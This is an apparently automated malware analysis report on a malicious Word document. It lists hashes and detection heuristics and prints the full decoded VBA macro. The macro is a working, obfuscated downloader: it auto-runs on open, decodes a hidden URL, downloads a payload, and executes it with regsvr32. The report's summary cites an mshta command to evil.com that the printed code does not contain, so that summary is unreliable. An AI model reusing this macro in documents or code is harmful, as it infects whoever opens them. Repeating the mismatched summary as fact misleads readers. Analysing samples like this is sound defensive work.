Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 84e2969e418f746c…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 115.5 KB
Created: 2020-07-23 08:54:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-09-15
MD5: 9a97c22becb5f8187bb088f3a891b5ec
SHA-1: bf42a86bb467400a51e63fb956cef5407d2aeebd
SHA-256: 84e2969e418f746c0500a3975aad550c9c0e906691720d221ff95faa76e885dc
Risk Score: 150

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter
  • T1105 Ingress Tool Transfer

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The script uses URLDownloadToFile to download a file and then executes it using 'cmd.exe /c mshta "http://evil.com/payload.hta"', indicating it acts as a downloader for a second-stage payload. The ClamAV detection also confirms its malicious nature.

Heuristics (5)

  • ClamAV: Doc.Downloader.GreenBox5-9139204-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.GreenBox5-9139204-0
  • VBA project inside OOXML [medium] (2 related findings) OOXML_VBA
    Document contains a VBA project: VBA macros present
  • URLDownloadToFile in VBA [critical] OLE_VBA_DOWNLOAD
    Matched line in script:
    #If VBA7 And Win64 Then
    Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal yF As LongPtr, ByVal Vk As String, ByVal kS As String, ByVal wd As LongPtr, ByVal Oh As LongPtr) As Long
    #Else
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    Matched line in script:
    End Function
    Sub autoopen()
    eg = i(c4)
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2014/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex (referenced by macro)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/ink (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2017/model3d (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2012/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2018/wordml/cex (referenced by macro)
    • http://schemas.microsoft.com/office/word/2016/wordml/cid (referenced by macro)
    • http://schemas.microsoft.com/office/word/2018/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (referenced by macro)
    • http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (referenced by macro)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3767 bytes
SHA-256: 6f9bf807b3a186c805765247af58cd4b52e3d1b79ff00bfa88651fd3a661ee7d
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Sw"
Public Const D As String = "Ub.pdf"
Function i(tz)
pc = hF(tz)
For Xu = 0 To UBound(pc)
 U2 = U2 & Chr(pc(Xu) Xor 1)
Next Xu
i = U2
End Function
Function hF(tz)
hF = Split(tz, " ")
End Function
Sub autoopen()
eg = i(c4)

' Motors indigo saturn sitter
' Aus dir greatly ventilation investigated
' Marsh carrot answer pagoda
' Immobility login epileptic
' Stuffy they froward
frm.download eg, D

' Troy preventive suspect
' Maple juno moving seeks
' Physics modes classic

' Nipple voices
' Paypal birds oasis aol
' Orpheus salzburg franchise ta
' Mpg outstrip upholstered exclusive lithe emissary lie
' Forecasts
' Ain sahib
' Keeping
' Unmindful

' Affiliated leech stewardess exalts baptised
' Slap personals

' Mill third inordinate talmud
' Verandah
' Stitch
' Xanax glance dishes

' Foods coterie
' Explode bated sixty-three
Dim bu As New WshShell

' Defraud crater sid
' Disconcerting
Call bu.run(hn & m & "32 " + D)
End Sub

Attribute VB_Name = "Sw1"
Sub E8()

' Narrative undefined hispanic brake
' Finland geometry skills mhz attempting understanding metro

' Outlive oxford threadbare
' Lodges obviate withdrawal snap passwords
' Enormous grammar upcoming cameron
' Operate malacca epilepsy misunderstand

' Presentation loftiness cook scholastic
' Shooting fatal charwoman

' Larboard signatures
' Apocryphal surge clive anchor

' Responsibilities acrimony
' Unconsciousness abstinence absences

' Oratorio individuals discriminate incision

' Coleman washington pharmaceuticals activated
' Conviction man-of-war synopsis countryside squat
' Scabbard

' Jim accessory
' Flurry
' Casket simultaneously deutsch bl seats dross
' Hurtful sic hic lake census savior gmbh

' Eddie bahrain jocund netscape
' Asbestos integration super
' Abandons humans ulcer enjoyable

' Lime monitors ser railway

' Suffolk bankruptcy ireland symbolic remark arbiter
' Glisten

' Shed harmful
' Burman british distract efficiency
' Spicy dancing accomplish bold
End Sub

Attribute VB_Name = "MR"
Public Const hn As String = "reg"
Public Const m As String = "svr"
Public Const c4 As String = "105 117 117 113 59 46 46 105 54 109 109 107 57 118 47 98 110 108 46 121 100 108 98 109 46 104 99 96 47 113 105 113 62 109 60 116 111 117 52 47 98 96 99 33"
#If VBA7 And Win64 Then
Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal yF As LongPtr, ByVal Vk As String, ByVal kS As String, ByVal wd As LongPtr, ByVal Oh As LongPtr) As Long
#Else
Public Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA"(ByVal yF As Long, ByVal Vk As String, ByVal kS As String, ByVal wd As Long, ByVal Oh As Long) As Long
#End If
Function zL()

' Suddenly
' Restrict relentlessly
' Greensboro schema z perceived throat
' Candidly diffusion diabolical

' Science temps rank
' Sexcam cower
' Underlie gentle budgets duplicate correlated
' Vulnerability cad consumers generation
End Function

Attribute VB_Name = "frm"
Attribute VB_Base = "0{5042355E-EF65-4CED-AAF7-8C19E7C8E308}{4D34EE08-B36A-4D23-B95B-83A523E8738F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub download(url, file)
    URLDownloadToFile 0, url, file, 0, 0
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 27648 bytes
SHA-256: 57e263df625c992a3db53ba0d9f68bc9bd8199749431d02a27e68f5e6fb2e74f